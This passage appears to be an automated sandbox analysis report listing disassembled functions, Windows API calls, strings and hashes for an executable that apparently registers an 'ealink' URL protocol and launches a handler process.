                                                                  Function 00407E57 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N@
                                                                  • API String ID: 0-1509896676
                                                                  • Opcode ID: ae613e775dc3108c7db1608caa2314f256298117eddb46c225e56a1a9229931d
                                                                  • Instruction ID: 46131d9779f233d169b6e074d7f52160adf2df670bc17c7086d440347f8f07bf
                                                                  • Opcode Fuzzy Hash: ae613e775dc3108c7db1608caa2314f256298117eddb46c225e56a1a9229931d
                                                                  • Instruction Fuzzy Hash: F1615A729003158FCB18CF48C49469EBBB2FF85314F5AC5AED8095B366C7B5998ACB84
                                                                  Function 0041FDAB Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N@
                                                                  • API String ID: 0-1509896676
                                                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                  • Instruction ID: bdf6f9bd4e9c2b627aef2c7ac3213d55244daae19c05cd7de719fac592f1173e
                                                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                  • Instruction Fuzzy Hash: 80615B729003158FCB18CF48C49469ABBF2FF85314F1AC5BED8095B366C7B5999ACB84
                                                                  Function 0040B709 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7:EB
                                                                  • API String ID: 0-1889068222
                                                                  • Opcode ID: f0024cec74ebbbe9ed6354c5ecd8b92f223d080b1e3504fc3efe176741fe6241
                                                                  • Instruction ID: a7ed0c96e2b368f480c50e53824cf43a1c1f7ef97a0af1023d6d51b4c014dd48
                                                                  • Opcode Fuzzy Hash: f0024cec74ebbbe9ed6354c5ecd8b92f223d080b1e3504fc3efe176741fe6241
                                                                  • Instruction Fuzzy Hash: 605128B2D05454ABE714CB54DC90AFF7779EB81305F28C1BBED49A2291CB3C5AC18E89
                                                                  Function 00421E53 Relevance: .3, Instructions: 346COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0556935cdc178c84ab3d19fc6851343a918f5e490f0f51218d4b1d9ca2ea2850
                                                                  • Instruction ID: c3c4d9516621444ab7e0387ffe99d7b6317f0dd7a5a3bc1d0d1cdd7813ece101
                                                                  • Opcode Fuzzy Hash: 0556935cdc178c84ab3d19fc6851343a918f5e490f0f51218d4b1d9ca2ea2850
                                                                  • Instruction Fuzzy Hash: 75D19E35E0026ACFDF24CFA8D9906EEB7B1FF64300F95426AC815AB351D7785A46CB84
                                                                  Function 00415210 Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction ID: 4d8af5c93ff15b13b4fc166f70c7e948e7880cd261db61d00fb0d6653f235f6a
                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction Fuzzy Hash: 7E112B77205C81C3D654866DD8B46F7A395FBC6320B3C43FBD0418BB58D23AA9C59D08
                                                                  Function 00406810 Relevance: 63.2, APIs: 1, Strings: 35, Instructions: 210libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: AgentAdd$AgentRemove$AgentTaskAdd$AgentTaskRemove$AgentTaskStatusGet$AgentTaskStatusSet$Command$Connect$Connect3$Disconnect$IsConnected$ItemClearCache$ItemDecryptCancel$ItemDecryptStart$ItemDownloadCancel$ItemDownloadStart$ItemDownloadTogglePauseState$ItemEnumPatches$ItemGetStatus$ItemInstallStart$ItemInstallStartBatch$ItemUnpackCancel$ItemUnpackStart$ItemUse$StateGet$StateSetProperty$StateSetTag$Unable to locate required %s$UserEnumContent$UserGetEntitlements$UserGetNames$UserIsLoggedIn$UserLogin$UserLogout$ViewSetContentFilters
                                                                  • API String ID: 1029625771-469933569
                                                                  • Opcode ID: 188e2270707432a5962ec1fd5cf00e03fe9ea02481facc80de23009df005a4e4
                                                                  • Instruction ID: 9fa1f707f8fb64ba1f71a20fb7b6fa33dd77cac9be6680ed116804a284e664ba
                                                                  • Opcode Fuzzy Hash: 188e2270707432a5962ec1fd5cf00e03fe9ea02481facc80de23009df005a4e4
                                                                  • Instruction Fuzzy Hash: CB71E170B212209BDB14BB75AA04A9A32D9EF45314F82943FE143B73D1DBBD9C148B9C
                                                                  Function 00403820 Relevance: 45.9, APIs: 18, Strings: 8, Instructions: 358stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00404010: __wcsicoll.LIBCMT ref: 004040D6
                                                                  • GetEnvironmentVariableW.KERNEL32(EACORECLI_SPAWNED,00000010,00000200,?,9C2039C9,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403918
                                                                  • _wcsnlen.LIBCMT ref: 00403936
                                                                    • Part of subcall function 00406810: LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,9C2039C9,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A03
                                                                  • lstrcpyW.KERNEL32(?,00000000,?,9C2039C9,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A22
                                                                  • lstrlenW.KERNEL32(00000000,?,9C2039C9,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A29
                                                                  • lstrlenW.KERNEL32(?,?,9C2039C9,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A3E
                                                                  • lstrlenW.KERNEL32(00000000,?,9C2039C9,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A45
                                                                  • lstrcpyW.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00403A8E
                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403A95
                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403A98
                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403AA8
                                                                  • GetStartupInfoW.KERNEL32 ref: 00403AEE
                                                                  • GetCommandLineW.KERNEL32 ref: 00403AF4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Environment$Stringslstrcpy$CommandFreeInfoLibraryLineLoadStartupVariable__wcsicoll_wcsnlen
                                                                  • String ID: %s environment variable found, entering blocking mode$%s=1$-wait option is set, entering blocking mode$D$EACORECLI_SPAWNED$Failed to launch handler process. %s$Handler process successfully spawned$wait
                                                                  • API String ID: 2447714805-1081694395
                                                                  • Opcode ID: 7a124c851049d3f06802cae96bf49cbf3fc812b641ea475440534917832cb425
                                                                  • Instruction ID: 6d00ab7843f541fbbc14f52a0966576ff50e96e8f61d5f7a95a8d4ff5e0bb530
                                                                  • Opcode Fuzzy Hash: 7a124c851049d3f06802cae96bf49cbf3fc812b641ea475440534917832cb425
                                                                  • Instruction Fuzzy Hash: 64D1D1712083409FD315DF28C845B5BBBE4BFC9318F048A2EF589A72D1D778A945CB9A
                                                                  Function 00403D10 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 242registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(80000000,ealink,00000000,00000000,00000000,000F003F,00000000,?,?,?,00000004), ref: 00403D98
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,00000004), ref: 00403E11
                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,URL:ealink protocol,00000028,?,?,?,?,00000004), ref: 00403E5E
                                                                  • RegSetValueExW.ADVAPI32(?,URL Protocol,00000000,00000001,00429530,00000002,?,?,00000004), ref: 00403E7B
                                                                  • RegCreateKeyW.ADVAPI32(?,DefaultIcon,?), ref: 00403E90
                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000002,?,?,?,?,?,00000004), ref: 00403ED8
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000004), ref: 00403EE1
                                                                  • RegCreateKeyW.ADVAPI32(?,shell,?), ref: 00403EF6
                                                                  • RegCreateKeyW.ADVAPI32(?,open,00000004), ref: 00403F17
                                                                  • RegCreateKeyW.ADVAPI32(00000004,command,?), ref: 00403F34
                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000002,?,?,?,?,00000004), ref: 00403F74
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000004), ref: 00403F7D
                                                                  • RegCloseKey.ADVAPI32(00000004,?,?,00000004), ref: 00403F86
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000004), ref: 00403F8F
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000004), ref: 00403F98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreate$Value$FileModuleName
                                                                  • String ID: "%s" "%%1" -wait$"%s",-%u$DefaultIcon$URL Protocol$URL:$URL:ealink protocol$command$ealink$open$shell
                                                                  • API String ID: 562726067-3366672052
                                                                  • Opcode ID: 29258b752a715726cb2019f92678dc0124f5f0abd6b8a6cad12d52febe84ad78
                                                                  • Instruction ID: 2d17851c17755659bb6fed31c70a1752706c36ece24bc0cbc964e87f1143786b
                                                                  • Opcode Fuzzy Hash: 29258b752a715726cb2019f92678dc0124f5f0abd6b8a6cad12d52febe84ad78
                                                                  • Instruction Fuzzy Hash: 8E91E271B00215AFD724CF68DC89FAAB3B8FF88710F108299E505A72D0D774AE45CB94
                                                                  Function 0041698A Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004157AE), ref: 00416992
                                                                  • __mtterm.LIBCMT ref: 0041699E
                                                                    • Part of subcall function 004166D7: DecodePointer.KERNEL32(FFFFFFFF,00416B00,?,004157AE), ref: 004166E8
                                                                    • Part of subcall function 004166D7: TlsFree.KERNEL32(FFFFFFFF,00416B00,?,004157AE), ref: 00416702
                                                                    • Part of subcall function 004166D7: DeleteCriticalSection.KERNEL32(00000000,00000000,77665810,?,00416B00,?,004157AE), ref: 0041B487
                                                                    • Part of subcall function 004166D7: _free.LIBCMT ref: 0041B48A
                                                                    • Part of subcall function 004166D7: DeleteCriticalSection.KERNEL32(FFFFFFFF,77665810,?,00416B00,?,004157AE), ref: 0041B4B1
                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004169B4
                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004169C1
                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004169CE
                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004169DB
                                                                  • TlsAlloc.KERNEL32(?,004157AE), ref: 00416A2B
                                                                  • TlsSetValue.KERNEL32(00000000,?,004157AE), ref: 00416A46
                                                                  • __init_pointers.LIBCMT ref: 00416A50
                                                                  • EncodePointer.KERNEL32(?,004157AE), ref: 00416A61
                                                                  • EncodePointer.KERNEL32(?,004157AE), ref: 00416A6E
                                                                  • EncodePointer.KERNEL32(?,004157AE), ref: 00416A7B
                                                                  • EncodePointer.KERNEL32(?,004157AE), ref: 00416A88
                                                                  • DecodePointer.KERNEL32(0041685B,?,004157AE), ref: 00416AA9
                                                                  • __calloc_crt.LIBCMT ref: 00416ABE
                                                                  • DecodePointer.KERNEL32(00000000,?,004157AE), ref: 00416AD8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00416AEA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
